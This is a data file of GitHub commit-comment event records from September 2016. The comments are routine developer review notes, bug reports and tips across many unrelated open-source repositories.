{"id":"4561702043","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19018120,"position":18,"line":17,"path":"README.adoc","commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T12:43:46Z","updated_at":"2016-09-14T12:43:46Z","body":"Isn't this what we agreed for the style guide though? Or is that limited to Next Steps? Also, do these references get picked up by GitHub? I assume not and we need to add a reference into a commit message instead."}},"created_at":"2016-09-14T12:43:46Z"}
{"id":"4561703553","type":"CommitCommentEvent","actor":{"login":"jasonhjohnson"},"repo":{"name":"aurelia-ui-toolkits/aurelia-materialize-bridge"},"payload":{"comment":{"id":19018122,"position":null,"line":null,"path":null,"commit_id":"9efddc28efb1ad2555bbd3e3ca0660814eadeeb8","created_at":"2016-09-14T12:44:06Z","updated_at":"2016-09-14T12:44:06Z","body":"Hi,\r\n\r\nI'm having some issues getting this setup with the CLI.\r\n\r\nI followed these instructions but ran into a few snags:\r\n\r\n1. When I run the following command from the `node_modules/.bin folder` I get the following error: http://take.ms/fWSYd. \r\n\r\n2. It doesn't seem like the javascript is working correctly as my input text is on top of the placeholder/label: http://take.ms/zdG96\r\n\r\n3. It seems like some fonts are missing or something: http://take.ms/Gta23\r\n\r\nAny help is appreciated!\r\n\r\nThanks,\r\nJason"}},"created_at":"2016-09-14T12:44:06Z"}
{"id":"4561703963","type":"CommitCommentEvent","actor":{"login":"danleechina"},"repo":{"name":"Alex311/TableCellWithAutoLayout"},"payload":{"comment":{"id":19018124,"position":162,"line":162,"path":"TableViewCellWithAutoLayout/TableViewController/RJTableViewCell.m","commit_id":"bde387b27e33605eeac3465475d2f2ff9775f163","created_at":"2016-09-14T12:44:11Z","updated_at":"2016-09-14T12:44:11Z","body":"Good advice. Sometime when you call layoutsubViews manually cause this too."}},"created_at":"2016-09-14T12:44:11Z"}
{"id":"4561706489","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19018128,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-14T12:44:40Z","updated_at":"2016-09-14T12:44:40Z","body":"@snicolet @mcostalba sorry for bumping again, but apart of the direct checkers issue, both of your bugfix attempts aren't actually calculating pinners completely correct: they mix them up with snipers for discovered checks. In fact by renaming the variable to snipersForKing you gave it the right abstract meaning Snicolet, but for pin-aware SEE bugfix we are interested solely in real pinners."}},"created_at":"2016-09-14T12:44:40Z"}
{"id":"4561711584","type":"CommitCommentEvent","actor":{"login":"CardContact"},"repo":{"name":"CardContact/OpenSC"},"payload":{"comment":{"id":19018137,"position":18,"line":92,"path":"src/libopensc/card-sc-hsm.c","commit_id":"643bc9bfa058315e8e0c225868ec35754d5dbff8","created_at":"2016-09-14T12:45:41Z","updated_at":"2016-09-14T12:45:41Z","body":"Bug !"}},"created_at":"2016-09-14T12:45:41Z"}
{"id":"4561714505","type":"CommitCommentEvent","actor":{"login":"deltabeard"},"repo":{"name":"deltabeard/avr-rtc"},"payload":{"comment":{"id":19018149,"position":166,"line":166,"path":"main.c","commit_id":"9224fc46959c7fd4151bc2ddfe0104adb986397c","created_at":"2016-09-14T12:46:18Z","updated_at":"2016-09-14T12:46:18Z","body":"Bad spacing"}},"created_at":"2016-09-14T12:46:18Z"}
{"id":"4561714956","type":"CommitCommentEvent","actor":{"login":"rbouqueau"},"repo":{"name":"gpac/gpac"},"payload":{"comment":{"id":19018150,"position":null,"line":null,"path":null,"commit_id":"a3c24c08463c481c1956e6d9992c53f60778b9cc","created_at":"2016-09-14T12:46:23Z","updated_at":"2016-09-14T12:46:23Z","body":"msvc10 only + if we remove from bb, the  build may break != not including it in installers"}},"created_at":"2016-09-14T12:46:23Z"}
{"id":"4561715525","type":"CommitCommentEvent","actor":{"login":"bruno-serfe"},"repo":{"name":"aslubsky/ng2-select"},"payload":{"comment":{"id":19018153,"position":null,"line":null,"path":null,"commit_id":"9762fb1362730ed258509dba58876363f01f9211","created_at":"2016-09-14T12:46:29Z","updated_at":"2016-09-14T12:46:29Z","body":"Hi @aslubsky , I'm installing the ng-select from package.json using git://github.com/aslubsky/ng2-select.git but after the install the changes in this commit are not coming, is there any other step I need to perform to see the changes when I'm installing your ng-select?\r\n\r\nBest"}},"created_at":"2016-09-14T12:46:29Z"}
{"id":"4561715642","type":"CommitCommentEvent","actor":{"login":"johanandren"},"repo":{"name":"johanandren/futiles"},"payload":{"comment":{"id":19018154,"position":13,"line":13,"path":"src/main/scala/markatta/futiles/CallingThreadExecutionContext.scala","commit_id":"d74757d1078f8efd60b5935ac4f261ac3012e2d1","created_at":"2016-09-14T12:46:30Z","updated_at":"2016-09-14T12:46:30Z","body":"Thanks, I'll look into it. Spontaneously it should be safe since it is an internal api and not used in any recursive methods. (btw it's essentially the same as the `ActorSystemImpl.internalCallingThreadExecutionContext` from Akka)"}},"created_at":"2016-09-14T12:46:30Z"}
{"id":"4561716086","type":"CommitCommentEvent","actor":{"login":"plaes"},"repo":{"name":"montjoie/linux"},"payload":{"comment":{"id":19018155,"position":null,"line":null,"path":null,"commit_id":"df82793d6bbe4db56cdb71d81dd6187d4a31f0e8","created_at":"2016-09-14T12:46:36Z","updated_at":"2016-09-14T12:46:36Z","body":"Optional is with single 'n' (in title)."}},"created_at":"2016-09-14T12:46:36Z"}
{"id":"4561716287","type":"CommitCommentEvent","actor":{"login":"deltabeard"},"repo":{"name":"deltabeard/avr-rtc"},"payload":{"comment":{"id":19018156,"position":117,"line":117,"path":"main.c","commit_id":"9224fc46959c7fd4151bc2ddfe0104adb986397c","created_at":"2016-09-14T12:46:38Z","updated_at":"2016-09-14T12:46:38Z","body":"Bad spacing"}},"created_at":"2016-09-14T12:46:38Z"}
{"id":"4561717577","type":"CommitCommentEvent","actor":{"login":"deltabeard"},"repo":{"name":"deltabeard/avr-rtc"},"payload":{"comment":{"id":19018159,"position":41,"line":41,"path":"main.c","commit_id":"9224fc46959c7fd4151bc2ddfe0104adb986397c","created_at":"2016-09-14T12:46:54Z","updated_at":"2016-09-14T12:46:54Z","body":"Bad alignment"}},"created_at":"2016-09-14T12:46:54Z"}
{"id":"4561718293","type":"CommitCommentEvent","actor":{"login":"fps01"},"repo":{"name":"DevGroup-ru/dotplant-store"},"payload":{"comment":{"id":19018161,"position":57,"line":59,"path":"src/helpers/ExtendedPriceHelper.php","commit_id":"1fb9447025301c9cc19d686fc8c37a863eb98b02","created_at":"2016-09-14T12:47:03Z","updated_at":"2016-09-14T12:47:03Z","body":"it's no readable fragment of code. Split it to different conditions or rewrite it more compact."}},"created_at":"2016-09-14T12:47:03Z"}
{"id":"4561721267","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19018165,"position":null,"line":null,"path":null,"commit_id":"ce6a0b4d0bdb378ac693d39f4be1a9d454518825","created_at":"2016-09-14T12:47:38Z","updated_at":"2016-09-14T12:47:38Z","body":"@xxFlare sure, his code is clean and works\r\n@dktapps thanks for trying on asyncai xd but wanted to remove anyways. new api etc incoming"}},"created_at":"2016-09-14T12:47:38Z"}
{"id":"4561723988","type":"CommitCommentEvent","actor":{"login":"janosgyerik"},"repo":{"name":"pierre-jean/codingame"},"payload":{"comment":{"id":19018175,"position":8,"line":6,"path":"README.md","commit_id":"4f70527521b7305c6b1bb2026db4afcc81b01bc3","created_at":"2016-09-14T12:48:13Z","updated_at":"2016-09-14T12:48:13Z","body":"I suspect that CodinGame will not be the only site where you practice solving problems. Over time, there will be others. One repo per platform will not be very practical, as they will all have the same boilerplate, which is tedious.\r\n\r\nHere's what I do :)\r\n\r\nI create one GitHub for coding exercises. I actually let GitHub suggest a funny name, like `animated-octo-batman`, which:\r\n\r\n1. Not something that other people will look at: looks stupid\r\n2. Makes me smile :)\r\n\r\nIn this repo, I create a Java project, with typical Maven dependencies (junit + mockito). In that project, I create some base package (for example `com.janosgyerik.practice`) and then one sub-package per platform, for example `codingame`, `leetcode`, `hackerrank`. In there I create further sub-packages as needed for `medium` and `hard` exercises. (Easy exercises are not worth putting under version control.)\r\n\r\nFurthermore, I implement solutions in a way that I can easily copy-paste from my workplace, and just delete the first `package` line, and then ready to submit. Often the solution must go in a class named `Solution`, so this means that I have one sub-package per exercise.\r\n\r\nLastly, I create these packages and sub-packages in `src/test/java` instead of `src/main/java`, so that the test classes are side by side the real ones. These programs will not be deployed anywhere, ever, so it makes sense to simplify the code organization.\r\n\r\nI hope this helps, and have fun!"}},"created_at":"2016-09-14T12:48:13Z"}
{"id":"4561733535","type":"CommitCommentEvent","actor":{"login":"mattymo"},"repo":{"name":"bogdando/kargo"},"payload":{"comment":{"id":19018196,"position":36,"line":38,"path":"roles/download/tasks/main.yml","commit_id":"f216083083f293b77a20812a24787c9cba52b0d0","created_at":"2016-09-14T12:50:10Z","updated_at":"2016-09-14T12:50:10Z","body":"Is there a plan B?"}},"created_at":"2016-09-14T12:50:10Z"}
{"id":"4561736420","type":"CommitCommentEvent","actor":{"login":"pattacini"},"repo":{"name":"robotology/icub-main"},"payload":{"comment":{"id":19018203,"position":null,"line":null,"path":null,"commit_id":"3b0616ca6b81591c5414bfeda7c43d3adc92ed5d","created_at":"2016-09-14T12:50:41Z","updated_at":"2016-09-14T12:50:41Z","body":"see https://github.com/robotology/QA/issues/139"}},"created_at":"2016-09-14T12:50:41Z"}
{"id":"4561741152","type":"CommitCommentEvent","actor":{"login":"johnvanbreda"},"repo":{"name":"Indicia-Team/warehouse"},"payload":{"comment":{"id":19018215,"position":null,"line":null,"path":null,"commit_id":"f54165b1934f823a5a423f8fc0fc5ed744ff9c09","created_at":"2016-09-14T12:51:38Z","updated_at":"2016-09-14T12:51:38Z","body":"Fixes #203"}},"created_at":"2016-09-14T12:51:38Z"}
{"id":"4561742127","type":"CommitCommentEvent","actor":{"login":"chrisma"},"repo":{"name":"hpi-swt2/wimi-portal"},"payload":{"comment":{"id":19018221,"position":40,"line":44,"path":"app/helpers/application_helper.rb","commit_id":"dc5b8d0e0819998a5783d6221b596fe04f2e3f8c","created_at":"2016-09-14T12:51:49Z","updated_at":"2016-09-14T12:51:49Z","body":"WTF OMG BBQ!"}},"created_at":"2016-09-14T12:51:49Z"}
{"id":"4561743421","type":"CommitCommentEvent","actor":{"login":"chrisma"},"repo":{"name":"hpi-swt2/wimi-portal"},"payload":{"comment":{"id":19018224,"position":40,"line":44,"path":"app/helpers/application_helper.rb","commit_id":"dc5b8d0e0819998a5783d6221b596fe04f2e3f8c","created_at":"2016-09-14T12:52:06Z","updated_at":"2016-09-14T12:52:06Z","body":"data: { confirm: t('helpers.links.confirm_delete', model: @contract.name) }"}},"created_at":"2016-09-14T12:52:06Z"}
{"id":"4561743903","type":"CommitCommentEvent","actor":{"login":"andreiglingeanu"},"repo":{"name":"ThemeFuse/Unyson"},"payload":{"comment":{"id":19018228,"position":5,"line":1164,"path":"framework/static/js/fw.js","commit_id":"0fc0b2cf748595313f7defe54308d87a6d0ad4b5","created_at":"2016-09-14T12:52:11Z","updated_at":"2016-09-14T12:52:11Z","body":"Good we have this. It really may be the case that someone will like to be notified about receiving `default_values`."}},"created_at":"2016-09-14T12:52:11Z"}
{"id":"4561744430","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ananya-bhattacharya/hydrator-plugins"},"payload":{"comment":{"id":19018231,"position":null,"line":null,"path":null,"commit_id":"8a939ac77da6f144c547f6cbf815f468c7525e68","created_at":"2016-09-14T12:52:17Z","updated_at":"2016-09-14T12:52:17Z","body":"Updated code with review comments except creating a new file for common logic.\r\nRaised PR #459 for common logic.\r\nWill update and refactor this PR, once that is reviewed and merged, since it is common for the other spark ml plugins.\r\nPlease review again. Thanks!"}},"created_at":"2016-09-14T12:52:17Z"}
{"id":"4561745485","type":"CommitCommentEvent","actor":{"login":"caseyg"},"repo":{"name":"sarahendren/aplusa"},"payload":{"comment":{"id":19018247,"position":5,"line":8,"path":"_courses/critical-designer-slash-activist-engineer.markdown","commit_id":"1e9b6e517984fdbdc549a4a70357f19cb72d2d4f","created_at":"2016-09-14T12:52:29Z","updated_at":"2016-09-14T12:52:29Z","body":"The display date meta field was missing (by default it says DISPLAY DATE HERE) so I added this. It's just a text field, so you can put whatever kind of date helps give context.\r\n\r\n![screen shot 2016-09-14 at 8 51 16 am](https://cloud.githubusercontent.com/assets/462020/18512731/74be7394-7a58-11e6-81c7-50a2b8a78011.png)\r\n"}},"created_at":"2016-09-14T12:52:29Z"}
{"id":"4561746241","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19018257,"position":null,"line":null,"path":null,"commit_id":"f9669b34d7203692aa165c5ec71ecd2c541aa177","created_at":"2016-09-14T12:52:37Z","updated_at":"2016-09-14T12:52:37Z","body":"https://ffmpeg.org/pipermail/ffmpeg-cvslog/2012-May/050381.html\r\nhttps://ffmpeg.org/doxygen/trunk/libmp3lame_8c-source.html"}},"created_at":"2016-09-14T12:52:37Z"}
{"id":"4561750779","type":"CommitCommentEvent","actor":{"login":"wallon-ines"},"repo":{"name":"wallon-ines/redmine_shib_auth"},"payload":{"comment":{"id":19018267,"position":null,"line":null,"path":null,"commit_id":"32d23cec170c34e737577c5a2862ff0f55130637","created_at":"2016-09-14T12:53:31Z","updated_at":"2016-09-14T12:53:31Z","body":"are you add shiboleth config in virtualhost and edited application_controller.rb ?\r\n\r\n`        <Location /httpauth-*>\r\n        RewriteEngine     On\r\n        RewriteCond       %{IS_SUBREQ} ^false$\r\n        RewriteCond       %{LA-U:REMOTE_USER} (.+)\r\n        RewriteRule ^.*$ - [E=RU:%1]\r\n        #RewriteRule       . - [E=RU:%1]\r\n        RequestHeader     add X_REMOTE_USER_6E3RZQKX %{RU}e\r\n        ShibRequestSetting requireSession On\r\n        ShibRequestSetting applicationId default\r\n        AuthType shibboleth\r\n        Require valid-user\r\n        </Location>\r\n`\r\n"}},"created_at":"2016-09-14T12:53:31Z"}
{"id":"4561751130","type":"CommitCommentEvent","actor":{"login":"chrisma"},"repo":{"name":"hpi-swt2/wimi-portal"},"payload":{"comment":{"id":19018269,"position":40,"line":44,"path":"app/helpers/application_helper.rb","commit_id":"dc5b8d0e0819998a5783d6221b596fe04f2e3f8c","created_at":"2016-09-14T12:53:36Z","updated_at":"2016-09-14T12:53:36Z","body":"Maybe there should be a \"delete with confirmation\" and a \"delete\" helper."}},"created_at":"2016-09-14T12:53:36Z"}
{"id":"4561751300","type":"CommitCommentEvent","actor":{"login":"CardContact"},"repo":{"name":"CardContact/OpenSC"},"payload":{"comment":{"id":19018270,"position":60,"line":133,"path":"src/libopensc/card-sc-hsm.c","commit_id":"643bc9bfa058315e8e0c225868ec35754d5dbff8","created_at":"2016-09-14T12:53:38Z","updated_at":"2016-09-14T12:53:38Z","body":"file_out == NULL is handled separately and always turned into file_out != null. This is used for both, applet selection and EF selection. FCP caching is only used for applet selection.\r\n\r\nThe resulting file_out needs to be duplicated anyway, as the caller is freeing the structure independently of the cached result."}},"created_at":"2016-09-14T12:53:38Z"}
{"id":"4561752383","type":"CommitCommentEvent","actor":{"login":"caseyg"},"repo":{"name":"sarahendren/aplusa"},"payload":{"comment":{"id":19018271,"position":4,"line":8,"path":"_courses/critical-designer-slash-activist-engineer.markdown","commit_id":"1e9b6e517984fdbdc549a4a70357f19cb72d2d4f","created_at":"2016-09-14T12:53:51Z","updated_at":"2016-09-14T12:53:51Z","body":"We had added a \"coming soon\" mode, which made the link to this class not clickable from the Courses page, though the page was still live. I disabled this, since the syllabus was ready."}},"created_at":"2016-09-14T12:53:51Z"}
{"id":"4561752851","type":"CommitCommentEvent","actor":{"login":"williamrijksen"},"repo":{"name":"Sensimity/com.sensimity.ti.client"},"payload":{"comment":{"id":19018273,"position":null,"line":null,"path":null,"commit_id":"6a98be7dd072864a5a29f2c146c65f1989ac7a17","created_at":"2016-09-14T12:53:56Z","updated_at":"2016-09-14T12:53:56Z","body":"I checked this prop from the appcelerator documentation. "}},"created_at":"2016-09-14T12:53:56Z"}
{"id":"4561753608","type":"CommitCommentEvent","actor":{"login":"Johnny2136"},"repo":{"name":"Johnny2136/GitlabAppDemo"},"payload":{"comment":{"id":19018275,"position":null,"line":null,"path":null,"commit_id":"1624e1246deeb58380c0b0c35bab374a41b5b75b","created_at":"2016-09-14T12:54:05Z","updated_at":"2016-09-14T12:54:05Z","body":"closes #3 "}},"created_at":"2016-09-14T12:54:05Z"}
{"id":"4561755176","type":"CommitCommentEvent","actor":{"login":"osfans"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19018277,"position":null,"line":null,"path":null,"commit_id":"5c5b87c18680b3dd45c9efa1196ea4b4cdefd910","created_at":"2016-09-14T12:54:23Z","updated_at":"2016-09-14T12:54:23Z","body":"或者應該內碼輸入漢字，反查當前方案的編碼。這個好像更實用些"}},"created_at":"2016-09-14T12:54:23Z"}
{"id":"4561757051","type":"CommitCommentEvent","actor":{"login":"skidding"},"repo":{"name":"skidding/react-cosmos"},"payload":{"comment":{"id":19018282,"position":null,"line":null,"path":null,"commit_id":"5d0645851b71a2898ceff6b03096d049916613f2","created_at":"2016-09-14T12:54:47Z","updated_at":"2016-09-14T12:54:47Z","body":"👍 "}},"created_at":"2016-09-14T12:54:47Z"}
{"id":"4561758085","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19018283,"position":55,"line":50,"path":"README.adoc","commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T12:54:56Z","updated_at":"2016-09-14T12:54:56Z","body":"I have no idea which is more idiomatic, but now that you've brought it up, I suspect `getByType()` is the preferred method from Java. The `getByName()` method enables the Groovy `extensions.greeting` syntax."}},"created_at":"2016-09-14T12:54:56Z"}
{"id":"4561763489","type":"CommitCommentEvent","actor":{"login":"kkarpieszuk"},"repo":{"name":"Automattic/sensei"},"payload":{"comment":{"id":19018295,"position":5,"line":7,"path":"woothemes-sensei.php","commit_id":"35432ca7609f7d0f8e8aae105d299d8513e77f12","created_at":"2016-09-14T12:55:56Z","updated_at":"2016-09-14T12:55:56Z","body":"I have been asked to do so, maybe I didn't understand. As I understood, you have something in you deployment scripts what places version tag automatically. \r\n\r\nPlease bring it back of course if I broke something :)"}},"created_at":"2016-09-14T12:55:56Z"}
{"id":"4561768406","type":"CommitCommentEvent","actor":{"login":"caseyg"},"repo":{"name":"sarahendren/aplusa"},"payload":{"comment":{"id":19018313,"position":21,"line":18,"path":"_courses/critical-designer-slash-activist-engineer.markdown","commit_id":"1e9b6e517984fdbdc549a4a70357f19cb72d2d4f","created_at":"2016-09-14T12:56:55Z","updated_at":"2016-09-14T12:56:55Z","body":"In Markdown, the lightweight formatting syntax used in Siteleaf, stacked lines of text need two spaces at the end of each line to create a linebreak. Otherwise it renders as a regular paragraph. You can see I added those spaces here."}},"created_at":"2016-09-14T12:56:55Z"}
{"id":"4561772269","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19018321,"position":16,"line":2492,"path":"resources/definitions/fdmprinter.def.json","commit_id":"750018003d6d43e346c4aba14767179a3a66890d","created_at":"2016-09-14T12:57:40Z","updated_at":"2016-09-14T12:57:40Z","body":"This change is not yet updated in the version upgrade system."}},"created_at":"2016-09-14T12:57:40Z"}
{"id":"4561774140","type":"CommitCommentEvent","actor":{"login":"cosmosgc"},"repo":{"name":"cosmosgc/FurryBrasil"},"payload":{"comment":{"id":19018326,"position":null,"line":null,"path":null,"commit_id":"1fb780f48a438c4c481228dc631e496eb2af767b","created_at":"2016-09-14T12:58:03Z","updated_at":"2016-09-14T12:58:03Z","body":"Obrigado por hostear esses últimos dias."}},"created_at":"2016-09-14T12:58:03Z"}
{"id":"4561776801","type":"CommitCommentEvent","actor":{"login":"kliput"},"repo":{"name":"aexmachina/ember-notify"},"payload":{"comment":{"id":19018334,"position":null,"line":null,"path":null,"commit_id":"d5a81aeec3fdf1bc649f097555f36e996bb10458","created_at":"2016-09-14T12:58:35Z","updated_at":"2016-09-14T12:58:35Z","body":"Hi,\r\nI'm using ember-i18n which recently changed their code to use ``Ember.String.htmlSafe``, but your type checking: ``text instanceof Ember.String.htmlSafe`` seems to not work. I've checked following statements:\r\n\r\n``(new Ember.String.htmlSafe('lol')) instanceof Ember.String.htmlSafe`` -> false\r\n``(new Ember.String.htmlSafe('lol')) instanceof Ember.Handlebars.SafeString`` -> true\r\n\r\nIs this type checking tested?"}},"created_at":"2016-09-14T12:58:35Z"}
{"id":"4561777472","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19018340,"position":null,"line":null,"path":null,"commit_id":"f2cb0a7d7b472e207e793378c97008000dcd701c","created_at":"2016-09-14T12:58:43Z","updated_at":"2016-09-14T12:58:43Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 998](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13262&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-14T12:58:43Z"}
{"id":"4561778251","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19018345,"position":60,"line":52,"path":"README.adoc","commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T12:58:53Z","updated_at":"2016-09-14T12:58:53Z","body":"This just highlights that I have done far more Groovy than Java these past years. `printf()` is definitely better here since we don't have another form of string expansion."}},"created_at":"2016-09-14T12:58:53Z"}
{"id":"4561780289","type":"CommitCommentEvent","actor":{"login":"rubenmartin"},"repo":{"name":"motech-implementations/ebodac"},"payload":{"comment":{"id":19018371,"position":null,"line":null,"path":null,"commit_id":"bcd4a3de6509b13f7634a4403a8f9f2305339c7e","created_at":"2016-09-14T12:59:18Z","updated_at":"2016-09-14T12:59:18Z","body":"@pmuchowski  please tests again , it seems there was a connection error in Jenkins as far as I noticed from the logs."}},"created_at":"2016-09-14T12:59:18Z"}
{"id":"4561781234","type":"CommitCommentEvent","actor":{"login":"danielshahaf"},"repo":{"name":"danielshahaf/parseable-dash-dash-help"},"payload":{"comment":{"id":19018377,"position":null,"line":null,"path":null,"commit_id":"8c21c2025c0eefaa3dbbabb58530c6c14078cca2","created_at":"2016-09-14T12:59:28Z","updated_at":"2016-09-14T12:59:28Z","body":"I envision the grammar would be generated from the same source data that drives the \"parse options from argv\" code.  This way, when a project wants to add a --foo option, they need to update just one place, not two."}},"created_at":"2016-09-14T12:59:28Z"}
{"id":"4561786853","type":"CommitCommentEvent","actor":{"login":"jgalat0"},"repo":{"name":"jgalat0/php"},"payload":{"comment":{"id":19018387,"position":null,"line":null,"path":null,"commit_id":"5c6ed9afb4d6684abf539fc45ff81d7da8f00814","created_at":"2016-09-14T13:00:34Z","updated_at":"2016-09-14T13:00:34Z","body":"Sos un boludo "}},"created_at":"2016-09-14T13:00:34Z"}
{"id":"4561791084","type":"CommitCommentEvent","actor":{"login":"gerardoretamar"},"repo":{"name":"720kb/radiobox.css"},"payload":{"comment":{"id":19018394,"position":null,"line":null,"path":null,"commit_id":"53821dd9f3ac35e97327fc0ec72c46ac2f2f5314","created_at":"2016-09-14T13:01:19Z","updated_at":"2016-09-14T13:01:19Z","body":"Video"}},"created_at":"2016-09-14T13:01:19Z"}
{"id":"4561794589","type":"CommitCommentEvent","actor":{"login":"pierre-jean"},"repo":{"name":"pierre-jean/codingame"},"payload":{"comment":{"id":19018397,"position":null,"line":null,"path":null,"commit_id":"4f70527521b7305c6b1bb2026db4afcc81b01bc3","created_at":"2016-09-14T13:01:58Z","updated_at":"2016-09-14T13:01:58Z","body":"Thank you for the advice! Gonna apply right away! :)"}},"created_at":"2016-09-14T13:01:58Z"}
{"id":"4561802021","type":"CommitCommentEvent","actor":{"login":"caseyg"},"repo":{"name":"sarahendren/aplusa"},"payload":{"comment":{"id":19018415,"position":30,"line":26,"path":"_courses/critical-designer-slash-activist-engineer.markdown","commit_id":"1e9b6e517984fdbdc549a4a70357f19cb72d2d4f","created_at":"2016-09-14T13:03:26Z","updated_at":"2016-09-14T13:03:26Z","body":"You can indicate semantic headings in Markdown using number signs.\r\n\r\n```\r\n# h1 (Course title, automatically filled in from the page title)\r\n\r\n## h2 (use these to indicate Course sections)\r\n\r\n### h3 (subsections)\r\n\r\n#### h4 (sub-subsections)\r\n\r\n(you can go all the way to h6, though most people don't need that many headings!)\r\n```\r\n\r\nThe Course page will automatically make a nesting, clickable sidebar index from headings using this logic.\r\n\r\n![screen shot 2016-09-14 at 9 03 21 am](https://cloud.githubusercontent.com/assets/462020/18513012/a3290a18-7a59-11e6-8c36-2900968ec176.png)\r\n\r\nThe top-most heading (_h1_ a.ka. one number sign `#` followed by text) is already in use by the Course title itself, so you can see than I start with a second level heading (_h2_ a.k.a. `##`).\r\n\r\nThe asterisk formatting you added to bold the text (e.g. `**bold**`) is unnecessary, because each heading level already has pre-defined styling applied to it, so I removed that for simplicity and consistency in all the headings throughout."}},"created_at":"2016-09-14T13:03:26Z"}
{"id":"4561809479","type":"CommitCommentEvent","actor":{"login":"caseyg"},"repo":{"name":"sarahendren/aplusa"},"payload":{"comment":{"id":19018431,"position":48,"line":41,"path":"_courses/critical-designer-slash-activist-engineer.markdown","commit_id":"1e9b6e517984fdbdc549a4a70357f19cb72d2d4f","created_at":"2016-09-14T13:04:53Z","updated_at":"2016-09-14T13:04:53Z","body":"See here, that I'm adding two spaces at the end of each stacked lines, to tell Markdown that we want linebreaks here. This pattern is only necessary for lines stacked within the same paragraph."}},"created_at":"2016-09-14T13:04:53Z"}
{"id":"4561809490","type":"CommitCommentEvent","actor":{"login":"joelittlejohn"},"repo":{"name":"dakrone/clj-http"},"payload":{"comment":{"id":19018430,"position":null,"line":null,"path":null,"commit_id":"7ec10113776655d04234edcb3238a5a50943980a","created_at":"2016-09-14T13:04:53Z","updated_at":"2016-09-14T13:04:53Z","body":"It's nice to have Rails and PHP support, but these are framework solutions/conventions that don't appear in any specification. The nature of a query string means that a name can have multiple values and I think clj-http should support this (without using a framework-specific solution). I like the idea of supporting many options but IMO this should be the default:\r\n\r\n```\r\nhttp://example.com?field=a&field=b&field=c\r\n```\r\n\r\nRe map params, I think they will be left unchanged, right? clj-http supported this kind of syntax for maps before 7ec10113776.\r\n"}},"created_at":"2016-09-14T13:04:53Z"}
{"id":"4561810536","type":"CommitCommentEvent","actor":{"login":"tbazant"},"repo":{"name":"SUSE/doc-ses"},"payload":{"comment":{"id":19018435,"position":null,"line":null,"path":null,"commit_id":"4bc9ed9729dbbc8ed0ae588038a39ef9a44b642a","created_at":"2016-09-14T13:05:05Z","updated_at":"2016-09-14T13:05:05Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;Xcxz0oeg&#x2F;1999-bug-983663-documenting-usr-share-doc-packages-salt-ceph-examples-cluster-buildup-sls-components\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Bug 983663 - documenting &#x2F;usr&#x2F;share&#x2F;doc&#x2F;packages&#x2F;salt-ceph&#x2F;examples&#x2F;cluster_buildup.sls components.</a>"}},"created_at":"2016-09-14T13:05:05Z"}
{"id":"4561817338","type":"CommitCommentEvent","actor":{"login":"webzunft"},"repo":{"name":"webgilde/advanced-ads-slider"},"payload":{"comment":{"id":19018454,"position":null,"line":null,"path":null,"commit_id":"af4406cabddcf2f55ebed1426ab65cdfbbf6d002","created_at":"2016-09-14T13:06:16Z","updated_at":"2016-09-14T13:06:16Z","body":"please don’t include it here, because this is the unchanged file from unslider. Include the fix inline into the plugin itself, where the other custom css fixes are located."}},"created_at":"2016-09-14T13:06:16Z"}
{"id":"4561817619","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19018456,"position":null,"line":null,"path":null,"commit_id":"79fa859bb0621903ea4191dc40bf75ae1c63a579","created_at":"2016-09-14T13:06:19Z","updated_at":"2016-09-14T13:06:19Z","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79fa859bb0621903ea4191dc40bf75ae1c63a579-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>Unhandled Failure</a>\n"}},"created_at":"2016-09-14T13:06:19Z"}
{"id":"4561820531","type":"CommitCommentEvent","actor":{"login":"Tuuleh"},"repo":{"name":"SumOfUs/Champaign"},"payload":{"comment":{"id":19018472,"position":10,"line":10,"path":"app/services/auth_token_verifier.rb","commit_id":"53496a08eeee7bf5868edefd9f70ea4e17b0e411","created_at":"2016-09-14T13:06:53Z","updated_at":"2016-09-14T13:06:53Z","body":"Thanks, this looks much nicer :+1: "}},"created_at":"2016-09-14T13:06:53Z"}
